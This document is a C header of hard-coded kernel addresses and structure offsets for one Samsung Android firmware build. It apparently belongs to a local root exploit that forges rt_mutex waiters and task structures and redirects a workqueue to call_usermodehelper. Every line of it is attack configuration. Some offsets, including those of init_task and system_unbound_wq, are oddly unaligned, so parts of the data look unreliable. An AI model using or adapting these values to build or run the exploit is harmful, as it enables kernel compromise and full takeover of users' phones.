#ifndef OFFSET_H
#define OFFSET_H

#if defined(APP_PAYLOAD) && APP_PAYLOAD
#define BUILD_VARIANT_LABEL "a37xq-A376BXXU1AZB7-app-p0-baseline"
#define APP_PHYS_P0_ORACLE 1
#define APP_PHYS_VIRTUAL_BASE_ORACLE 1
#define KIMAGE_VIRTUAL_BASE_MIN 0xffffffd080000000ULL
#define KIMAGE_VIRTUAL_BASE_MAX 0xfffffff07fe00000ULL
#else
#define BUILD_VARIANT_LABEL "a37xq-A376BXXU1AZB7-root-umh"
#endif

#ifndef BUILD_FINGERPRINT
#define BUILD_FINGERPRINT \
  "samsung/a37xnaxx/a37x:16/BP4A.251205.006/A376BXXU1AZB7_OJM1AZB7:user/release-keys"
#endif

#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define P0_PAGE_OFFSET 0xffffff8000000000ULL
#define P0_PHYS_OFFSET 0x80000000ULL
#define P0_KERNEL_PHYS_LOAD 0x80000000ULL
#define SKB_DATA_DELTA (-0xe80LL)
#define KMALLOC_CACHE_TYPES 3
#define KMALLOC_CGROUP_TYPE 2

#define SLIDE_FAKE_WAITER_PRIO 0
#define SLIDE_WAITER_WAKE_STATE 0
#define SLIDE_LOCK_OWNER_VALUE 1ULL
#define SLIDE_USE_FAKE_TASK 1

/* Verified A37 offsets - from kernel analysis */
#define SYSTEM_UNBOUND_WQ_OFF 0x011bf35bULL
#define INIT_TASK_OFF 0x011937c3ULL

/* A37 function offsets - from vmlinux.elf */
#define ASHMEM_IOCTL_OFF 0x00d37cf8ULL
#define CALL_USERMODEHELPER_EXEC_WORK_OFF 0x000d4468ULL
#define NOOP_LLSEEK_OFF 0x003a1414ULL
#define COPY_SPLICE_READ_OFF 0x003ef02cULL
#define CONFIGFS_READ_ITER_OFF 0x00470d44ULL
#define CONFIGFS_BIN_WRITE_ITER_OFF 0x00471274ULL

/* Task structure offsets - confirmed from BTF */
#define TASK_PI_LOCK_OFF 0x924
#define TASK_PI_BLOCKED_ON_OFF 0x950

/* rt_mutex_waiter offsets - confirmed from BTF */
#define RT_MUTEX_WAITER_TASK_OFF 0x30

/* Workqueue offsets */
#define WORK_DATA_OFF 0x00
#define WORK_ENTRY_OFF 0x08
#define WORK_FUNC_OFF 0x18

#define PWQ_POOL_OFF 0x00
#define PWQ_WQ_OFF 0x08
#define PWQ_WORK_COLOR_OFF 0x10
#define PWQ_REFCNT_OFF 0x18
#define PWQ_NR_IN_FLIGHT_OFF 0x1c
#define PWQ_NR_ACTIVE_OFF 0x5c
#define PWQ_MAX_ACTIVE_OFF 0x60

#define POOL_WORKLIST_OFF 0x28
#define POOL_NR_IDLE_OFF 0x3c

#define WQ_DFL_PWQ_OFF 0xb0

/* File operations */
#define SIZEOF_FILE_OPERATIONS 0x110
#define FOPS_OWNER_OFF 0x00
#define FOPS_LLSEEK_OFF 0x08
#define FOPS_READ_OFF 0x10
#define FOPS_WRITE_OFF 0x18
#define FOPS_READ_ITER_OFF 0x20
#define FOPS_WRITE_ITER_OFF 0x28
#define FOPS_UNLOCKED_IOCTL_OFF 0x50
#define FOPS_COMPAT_IOCTL_OFF 0x58
#define FOPS_MMAP_OFF 0x60
#define FOPS_OPEN_OFF 0x70
#define FOPS_RELEASE_OFF 0x80
#define FOPS_SPLICE_READ_OFF 0xc8
#define FOPS_SHOW_FDINFO_OFF 0xe0

/* Derived addresses */
#define ASHMEM_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_IOCTL_OFF)
#define CALL_USERMODEHELPER_EXEC_WORK (KIMAGE_TEXT_BASE + CALL_USERMODEHELPER_EXEC_WORK_OFF)
#define SYSTEM_UNBOUND_WQ (KIMAGE_TEXT_BASE + SYSTEM_UNBOUND_WQ_OFF)
#define INIT_TASK (KIMAGE_TEXT_BASE + INIT_TASK_OFF)

#endif
